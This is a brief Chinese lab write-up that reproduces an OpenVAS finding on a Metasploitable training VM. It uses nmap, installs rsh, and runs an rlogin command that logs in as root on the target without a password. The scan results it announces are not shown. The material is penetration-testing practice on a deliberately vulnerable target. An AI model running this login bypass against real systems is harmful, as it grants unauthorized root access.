在使用openvas对meta靶机进行漏扫时,发现高危漏洞如下:
对此尝试进行复现,实验环境:
攻击机:kali linux
靶机:metasploittable ip:192.168.204.130
首先使用nmap对靶机进行探测,命令为nmap 192.168.204.130
发现所有端口可正常访问
在kali上安装rsh服务,命令为:
sudo apt-get install rsh-server #server
sudo apt-get install rsh-client #客户端
使用rlogin命令:rlogin -l root 192.168.204.130尝试绕过密码登录,发现成功
完成该漏洞复现